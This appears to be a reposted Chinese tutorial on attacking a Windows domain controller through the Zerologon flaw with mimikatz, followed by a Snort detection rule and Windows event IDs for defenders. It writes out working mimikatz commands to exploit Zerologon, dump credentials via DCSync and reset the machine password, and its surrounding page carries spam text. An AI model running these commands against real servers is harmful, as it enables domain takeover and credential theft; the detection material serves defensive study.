中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

mimikatz怎么利用zerologon攻擊域控服務器

發布時間:2021-07-26 21:34:07 來源:億速云 閱讀:407 作者:chen 欄目:大數據

本篇內容主要講解“mimikatz怎么利用zerologon攻擊域控服務器”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“mimikatz怎么利用zerologon攻擊域控服務器”吧!

 

0x01 前言

mimikatz 20200918版本支持通過zerologon漏洞攻擊域控服務器。下載鏈接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截圖如下mimikatz怎么利用zerologon攻擊域控服務器

 

mimikatz相關命令

  1. lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc
  2. lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通過zerologon漏洞攻擊域控服務器
  3. lsadump::dcsync
  4. lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢復密碼
mimikatz怎么利用zerologon攻擊域控服務器  
 

snort 檢測規則


alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
   

pcap包

利用zerologon漏洞攻擊域控的數據包,方便同學們寫完規則做測試pcap github下載地址

 

windows事件管理器自查

在未打補丁的域控,重點查看windows事件管理器中,eventid為4742或者4624, 5805

在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。藍隊可以重點關注這幾個事件ID以方便自查

  1. 當在初始部署階段允許存在漏洞的Netlogon安全通道連接時,將生成事件ID 5829。
  2. 管理員可以監控事件ID 5827和5828,這些事件ID在存在漏洞的Netlogon連接被拒絕時觸發
  3. 5830,5831  如果“域控制器:允許易受攻擊的Netlogon安全通道連接”組策略允許連接。

mimikatz通過zerologon攻擊成功后,將會留下事件id為4648。

 

到此,相信大家對“mimikatz怎么利用zerologon攻擊域控服務器”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

富川| 土默特左旗| 南江县| 榆树市| 浙江省| 苍南县| 大石桥市| 台南县| 舒兰市| 合肥市| 荔浦县| 榆林市| 泗洪县| 南华县| 维西| 新宁县| 奎屯市| 广河县| 普兰店市| 宁阳县| 纳雍县| 横山县| 丰宁| 浏阳市| 咸宁市| 霍山县| 永吉县| 平泉县| 淅川县| 公安县| 潞城市| 宣汉县| 星子县| 磐石市| 连城县| 宁武县| 共和县| 北流市| 锡林郭勒盟| 内丘县| 招远市|